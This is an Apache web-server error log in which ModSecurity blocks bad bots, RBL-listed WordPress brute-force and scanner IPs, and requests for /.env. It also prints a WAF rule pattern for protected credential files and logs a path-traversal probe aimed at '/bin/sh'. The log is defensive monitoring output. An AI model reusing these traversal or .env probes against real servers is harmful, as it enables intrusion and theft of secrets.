[Tue May 26 15:25:41.830951 2026] [security2:error] [pid 707292:tid 707502] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuHdKAqlRPSIEFAuuDDAAAANU"]
[Tue May 26 15:25:42.675233 2026] [security2:error] [pid 707292:tid 707443] [client 114.119.140.239:32655] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ucdc.co.in"] [uri "/robots.txt"] [unique_id "ahVuHtKAqlRPSIEFAuuDNAAAAJo"]
[Tue May 26 15:25:43.890858 2026] [security2:error] [pid 707292:tid 707471] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuH9KAqlRPSIEFAuuDUAAAALY"]
[Tue May 26 15:25:44.758850 2026] [security2:error] [pid 707292:tid 707450] [client 85.208.96.196:57790] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVuINKAqlRPSIEFAuuDbgAAAKE"]
[Tue May 26 15:25:44.758976 2026] [security2:error] [pid 707292:tid 707450] [client 85.208.96.196:57790] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVuINKAqlRPSIEFAuuDbgAAAKE"]
[Tue May 26 15:25:46.046138 2026] [security2:error] [pid 707292:tid 707461] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuIdKAqlRPSIEFAuuDigAAAKw"]
[Tue May 26 15:25:47.929950 2026] [security2:error] [pid 707292:tid 707340] [remote 82.223.0.235:36230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.0.223.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVuI9KAqlRPSIEFAuuDxgABAy8"]
[Tue May 26 15:25:48.029772 2026] [security2:error] [pid 707292:tid 707438] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuI9KAqlRPSIEFAuuDwQAAAJU"]
[Tue May 26 15:25:49.395345 2026] [security2:error] [pid 707292:tid 707517] [client 176.65.139.232:59746] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.koiralalogistics.com.onesoft.in"] [uri "/.env"] [unique_id "ahVuJdKAqlRPSIEFAuuD8wAAAOQ"]
[Tue May 26 15:25:50.578464 2026] [security2:error] [pid 707292:tid 707497] [client 74.7.175.151:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.landmark.thedebateafrica.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVuJtKAqlRPSIEFAuuEGgAAANA"]
[Tue May 26 15:25:50.579118 2026] [security2:error] [pid 707292:tid 707461] [client 74.7.175.151:60900] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.landmark.thedebateafrica.org"] [uri "/robots.txt"] [unique_id "ahVuJtKAqlRPSIEFAuuEGAAArDI"]
[Tue May 26 15:25:50.857637 2026] [security2:error] [pid 707292:tid 707493] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuJtKAqlRPSIEFAuuEFgAAAMw"]
[Tue May 26 15:25:52.957872 2026] [security2:error] [pid 707292:tid 707428] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuKNKAqlRPSIEFAuuEUwAAAIs"]
[Tue May 26 15:25:54.599443 2026] [security2:error] [pid 707292:tid 707454] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuKtKAqlRPSIEFAuuEhQAAAKU"]
[Tue May 26 15:25:57.215560 2026] [security2:error] [pid 707292:tid 707454] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuLNKAqlRPSIEFAuuEwwAAAKU"]
[Tue May 26 15:25:57.963537 2026] [security2:error] [pid 707292:tid 707515] [client 113.177.222.207:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuLdKAqlRPSIEFAuuE2AAAAOI"]
[Tue May 26 15:25:58.476798 2026] [security2:error] [pid 707292:tid 707530] [client 165.140.119.146:61762] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 146.119.140.165.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVuLtKAqlRPSIEFAuuE6gAAAPE"], referer: https://www.bloggertarget.com
[Tue May 26 15:25:58.476937 2026] [security2:error] [pid 707292:tid 707530] [client 165.140.119.146:61762] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVuLtKAqlRPSIEFAuuE6gAAAPE"], referer: https://www.bloggertarget.com
[Tue May 26 15:25:59.159933 2026] [security2:error] [pid 707292:tid 707508] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuLtKAqlRPSIEFAuuE9QAAANs"]
[Tue May 26 15:25:59.351930 2026] [security2:error] [pid 707292:tid 707473] [client 74.7.175.151:48596] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.alpha-bau.net"] [uri "/cgi-sys/404.html"] [unique_id "ahVuL9KAqlRPSIEFAuuFFgAAALg"]
[Tue May 26 15:26:00.961021 2026] [security2:error] [pid 707292:tid 707506] [client 192.145.125.92:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVuMNKAqlRPSIEFAuuFRAAAANk"], referer: https://www.anujtradingco.com/
[Tue May 26 15:26:01.378380 2026] [security2:error] [pid 707292:tid 707439] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuMNKAqlRPSIEFAuuFRwAAAJY"]
[Tue May 26 15:26:02.355027 2026] [security2:error] [pid 707292:tid 707485] [client 192.145.125.92:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVuMtKAqlRPSIEFAuuFawAAAMQ"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1430893&moderation-hash=336e5499fbddf823815df3a0e5a22c7e
[Tue May 26 15:26:04.344617 2026] [security2:error] [pid 707292:tid 707502] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuM9KAqlRPSIEFAuuFjgAAANU"]
[Tue May 26 15:26:04.670311 2026] [security2:error] [pid 707292:tid 707454] [client 20.172.36.113:61310] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "midrivermarina.com"] [uri "/.env"] [unique_id "ahVuNNKAqlRPSIEFAuuFpQAAAKU"]
[Tue May 26 15:26:04.915422 2026] [security2:error] [pid 707292:tid 707449] [client 20.172.36.113:61367] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "midrivermarina.com"] [uri "/"] [unique_id "ahVuNNKAqlRPSIEFAuuFpgAAAKA"]
[Tue May 26 15:26:05.573857 2026] [security2:error] [pid 707292:tid 707486] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuNdKAqlRPSIEFAuuFsgAAAMU"]
[Tue May 26 15:26:07.900266 2026] [security2:error] [pid 707292:tid 707427] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuN9KAqlRPSIEFAuuF5gAAAIo"]
[Tue May 26 15:26:08.089861 2026] [security2:error] [pid 707292:tid 707440] [client 192.145.125.92:48108] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.125.145.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVuONKAqlRPSIEFAuuF9AAAAJc"], referer: https://anujtradingco.com
[Tue May 26 15:26:08.439860 2026] [security2:error] [pid 707292:tid 707458] [client 223.109.252.175:41014] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.shirdisaibabatemple.org"] [uri "/"] [unique_id "ahVuONKAqlRPSIEFAuuGAgAAAKk"]
[Tue May 26 15:26:08.439991 2026] [security2:error] [pid 707292:tid 707458] [client 223.109.252.175:41014] ModSecurity: Warning. Matched phrase "Sogou web spider" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.shirdisaibabatemple.org"] [uri "/"] [unique_id "ahVuONKAqlRPSIEFAuuGAgAAAKk"]
[Tue May 26 15:26:08.564704 2026] [security2:error] [pid 707292:tid 707453] [client 66.249.64.110:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVuONKAqlRPSIEFAuuGBAAAAKQ"]
[Tue May 26 15:26:08.565130 2026] [security2:error] [pid 707292:tid 707429] [client 66.249.64.110:63193] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVuONKAqlRPSIEFAuuGAQAAAIw"]
[Tue May 26 15:26:09.853369 2026] [security2:error] [pid 707292:tid 707456] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuOdKAqlRPSIEFAuuGJAAAAKc"]
[Tue May 26 15:26:10.137794 2026] [security2:error] [pid 707292:tid 707431] [client 185.96.37.68:0] ModSecurity: Warning. Matched phrase "Nutch" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "lifestylemne.me"] [uri "/index.php"] [unique_id "ahVuOdKAqlRPSIEFAuuGJwAAAI4"]
[Tue May 26 15:26:10.145814 2026] [security2:error] [pid 707292:tid 707489] [client 185.96.37.68:47955] ModSecurity: Warning. Matched phrase "Nutch" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "lifestylemne.me"] [uri "/robots.txt"] [unique_id "ahVuOdKAqlRPSIEFAuuGJQAAAMg"]
[Tue May 26 15:26:12.020859 2026] [security2:error] [pid 707292:tid 707493] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuO9KAqlRPSIEFAuuGaAAAAMw"]
[Tue May 26 15:26:13.932739 2026] [security2:error] [pid 707292:tid 707455] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuPdKAqlRPSIEFAuuGnwAAAKY"]
[Tue May 26 15:26:16.081282 2026] [security2:error] [pid 707292:tid 707449] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuP9KAqlRPSIEFAuuG1gAAAKA"]
[Tue May 26 15:26:18.191842 2026] [autoindex:error] [pid 707292:tid 707449] [client 198.235.24.170:58966] AH01276: Cannot serve directory /home2/svijakqj/kmmc.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:26:18.227001 2026] [security2:error] [pid 707292:tid 707477] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuQdKAqlRPSIEFAuuHEAAAALw"]
[Tue May 26 15:26:19.882028 2026] [security2:error] [pid 707292:tid 707532] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuQ9KAqlRPSIEFAuuHQAAAAPM"]
[Tue May 26 15:26:21.686387 2026] [security2:error] [pid 707292:tid 707343] [remote 143.198.203.76:43682] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.203.198.143.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVuRdKAqlRPSIEFAuuHbwAA5zI"]
[Tue May 26 15:26:22.011671 2026] [security2:error] [pid 707292:tid 707485] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuRdKAqlRPSIEFAuuHcgAAAMQ"]
[Tue May 26 15:26:23.771483 2026] [security2:error] [pid 707292:tid 707429] [client 74.7.230.40:49996] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.landsonlogistics.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVuR9KAqlRPSIEFAuuHzAAAjGo"]
[Tue May 26 15:26:23.843889 2026] [security2:error] [pid 707292:tid 707540] [client 74.7.228.50:52074] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVuR9KAqlRPSIEFAuuH0wAA-3I"]
[Tue May 26 15:26:24.580332 2026] [security2:error] [pid 707292:tid 707530] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuSNKAqlRPSIEFAuuH2gAAAPE"]
[Tue May 26 15:26:25.165223 2026] [core:error] [pid 707292:tid 707454] [client 101.47.8.187:40310] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Tue May 26 15:26:26.178949 2026] [security2:error] [pid 707292:tid 707546] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuSdKAqlRPSIEFAuuIEgAAAQE"]
[Tue May 26 15:26:27.716329 2026] [security2:error] [pid 707292:tid 707457] [client 114.119.130.18:42463] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "moes-art.com"] [uri "/blog/in-game-advertisements-a-win-win-for-brands/"] [unique_id "ahVuS9KAqlRPSIEFAuuIVQAAAKg"], referer: https://moes-art.com/blog/
[Tue May 26 15:26:28.884572 2026] [security2:error] [pid 707292:tid 707548] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuTNKAqlRPSIEFAuuIbgAAAQM"]
[Tue May 26 15:26:29.435498 2026] [security2:error] [pid 707292:tid 707511] [client 213.35.106.232:55385] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.whitesun.in"] [uri "/wp-login.php"] [unique_id "ahVuTdKAqlRPSIEFAuuIhAAAAN4"]
[Tue May 26 15:26:29.451373 2026] [security2:error] [pid 707292:tid 707460] [client 165.16.171.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuTdKAqlRPSIEFAuuIfQAAAKs"]
[Tue May 26 15:26:30.685346 2026] [autoindex:error] [pid 707292:tid 707469] [client 213.35.106.232:55572] AH01276: Cannot serve directory /home2/whitece9/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:26:30.996419 2026] [security2:error] [pid 707292:tid 707538] [client 213.35.106.232:55572] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.whitesun.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVuTtKAqlRPSIEFAuuIsQAAAPk"]
[Tue May 26 15:26:31.000464 2026] [security2:error] [pid 707292:tid 707501] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuTtKAqlRPSIEFAuuIrAAAANQ"]
[Tue May 26 15:26:32.037933 2026] [security2:error] [pid 707292:tid 707432] [client 213.35.106.232:55840] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.whitesun.in"] [uri "/wp-admin/load-scripts.php"] [unique_id "ahVuUNKAqlRPSIEFAuuIzgAAAI8"]
[Tue May 26 15:26:32.195928 2026] [security2:error] [pid 707292:tid 707491] [client 114.119.148.237:21475] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahVuUNKAqlRPSIEFAuuI0wAAAMo"], referer: http://haddingtonwines.com/cart?remove_item=e8432fb72c61c9066957124e5a420a05
[Tue May 26 15:26:33.088261 2026] [security2:error] [pid 707292:tid 707437] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuUNKAqlRPSIEFAuuI5AAAAJQ"]
[Tue May 26 15:26:33.214408 2026] [security2:error] [pid 707292:tid 707485] [client 213.35.106.232:56098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.whitesun.in"] [uri "/wp-admin/load-styles.php"] [unique_id "ahVuUdKAqlRPSIEFAuuI8AAAAMQ"]
[Tue May 26 15:26:34.588096 2026] [security2:error] [pid 707292:tid 707495] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuUtKAqlRPSIEFAuuJDwAAAM4"]
[Tue May 26 15:26:35.510499 2026] [security2:error] [pid 707292:tid 707544] [client 213.35.106.232:56283] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.whitesun.in"] [uri "/wp-includes/version.php"] [unique_id "ahVuU9KAqlRPSIEFAuuJPQAAAP8"]
